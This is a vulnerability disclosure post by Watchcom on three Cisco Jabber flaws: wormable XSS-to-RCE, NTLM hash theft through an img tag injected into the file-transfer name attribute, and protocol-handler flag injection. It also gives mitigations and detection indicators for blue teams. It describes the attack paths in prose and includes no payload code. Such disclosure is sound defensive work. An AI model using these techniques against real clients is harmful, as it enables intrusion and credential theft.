Watchcom discovers new Cisco Jabber vulnerabilities
TL;DR Three months ago, Watchcom disclosed four high severity vulnerabilities in Cisco Jabber. One of the vulnerabilities allowed Remote Code Execution (RCE) by sending specially crafted chat messages. The vulnerabilities were reported to Cisco and a patch was issued. Shortly after, one of Watchcom’s clients requested a verification audit of the patch to ensure that the vulnerabilities had been sufficiently mitigated.
Figure 1: Jabber RCE through malicious filenames.
Three of the four vulnerabilities Watchcom disclosed in September have not been sufficiently mitigated. Cisco released a patch that fixed the injection points we reported, but the underlying problem has not been fixed. As such, we were able to find new injection points that could be used to exploit the vulnerabilities. All currently supported versions of the Cisco Jabber client (12.1 - 12.9) are affected.
The three vulnerabilities have been assigned new CVE numbers to distinguish them from the vulnerabilities disclosed in September. The new CVE numbers and the corresponding CVSS scores are listed below:
- CVE-2020-26085: Cisco Jabber Cross-Site Scripting leading to RCE (CVSS 9.9)
- CVE-2020-27132: Cisco Jabber Password Hash Stealing Information Disclosure (CVSS 6.5)
- CVE-2020-27127: Cisco Jabber Custom Protocol Handler Command Injection (CVSS 4.3)
This article describes the technical details of the vulnerabilities and gives advice for detection and mitigation.
The new vulnerabilities have the same impact as the original and range from medium to critical severity. Two of the vulnerabilities can be used to gain remote code execution.
The most severe vulnerability is a Cross Site Scripting (XSS) vulnerability that can be used to achieve RCE by escaping the CEF sandbox. This vulnerability does not require user interaction and is wormable, since the payload is delivered via an instant message. This means that it can be used to automatically spread malware without any user interaction.
The second vulnerability can be exploited to collect NTLM password hashes from unsuspecting users. By sending a message that contains a malicious <img> tag, an attacker can force the victim’s Cisco Jabber client to interact with a file share the attacker controls. If the file share requires authentication, the victim’s NTLM password hash will be sent.
The final vulnerability regards the custom protocol handlers used by Cisco Jabber. These protocol handlers are vulnerable to command injection because they fail to consider URLs that contain spaces. By including a space in the URL, an attacker can inject arbitrary command line flags that will be passed to the application. Since the application uses CEF and accepts Chromium command line flags, several flags that can be used to execute arbitrary commands or load arbitrary DLLs exist.
While the patch has filtered some of these, Watchcom was still able to identify a dangerous flag that could bypass the filter. The flag can be used to enable remote debugging, allowing an attacker on the same network to take control of the embedded browser in the victims Cisco Jabber client.
Two of the vulnerabilities are caused by the ability to inject custom HTML tags into XMPP messages. The patch released in September only patched the specific injection points that Watchcom had identified. The underlying issue was not addressed. We were therefore able to find new injection points that could be used to exploit the vulnerabilities.
Figure 2: The name attribute of file transfer messages was identified as a new injection point. Here, an img tag pointing to a malicious file share is injected into the message.
One of these injection points is the filename of a file sent through Cisco Jabber. The filename is specified by the name attribute of a file tag sent over XMPP. This attribute is displayed in the DOM when an incoming file transfer is received. The value of the attribute is not sanitized before being added to the DOM, making it possible to inject arbitrary HTML tags into the file transfer message by manipulating it.
Figure 3: The malicious img tag is loaded by the victim.
No additional security measures had been put in place and it was therefore possible to both gain remote code execution and steal NTLM password hashes using this new injection point.
Like last time, we advise all Cisco Jabber users to update to the latest version as soon as possible.
Since some of the vulnerabilities are wormable, organizations should consider disabling communication with external organizations through Cisco Jabber until all employees have installed the update. This can be done by disabling XMPP federation or configuring a policy for XMPP federation. See this article from Cisco for more information.
Note that Watchcom has not verified the patches and cannot guarantee that they are effective. We therefore recommend performing a security audit of the patched version before putting it to use.
Blue teams that want to detect potential exploitation of these vulnerabilities should be aware of the following indicators:
- XMPP messages with unusual HTML content.
- Invocations of CiscoJabber.exe with unusual flags.
- Unusual sub-processes of CiscoJabber.exe.
- Malicious files being sent through Cisco Jabber’s file sharing feature.
Cisco has published a security advisory for the vulnerabilities - see the following link for their recommendations.
The continued existence of these vulnerabilities, even after the first patch, highlight the complexity of modern software and the challenges developers face when trying to secure it. When choosing to use frameworks such as CEF, it is important to consider their security implications. Security should also be considered in every step of the development process, both in the initial planning stages as well as during implementation and maintenance.
This also serves as a reminder that software acquired from external vendors also pose a risk to organizations’ IT-security. It is important to be aware of these risks and take steps to mitigate them. Watchcom recommends regular audits of third-party software for security vulnerabilities.
- 2nd September 2020: Original vulnerabilities publicly disclosed. Patches released by Cisco.
- 25th September 2020: New vulnerabilities discovered and reported to Cisco PSIRT. Case number assigned by Cisco. Issue forwarded to the Cisco Jabber engineering team.
- 12th October 2020: Vulnerabilities confirmed by Cisco.
- 12th October 2020 - 10th December 2020: Patches developed.
- 10th December 2020: Patches released. Vulnerabilities publicly disclosed.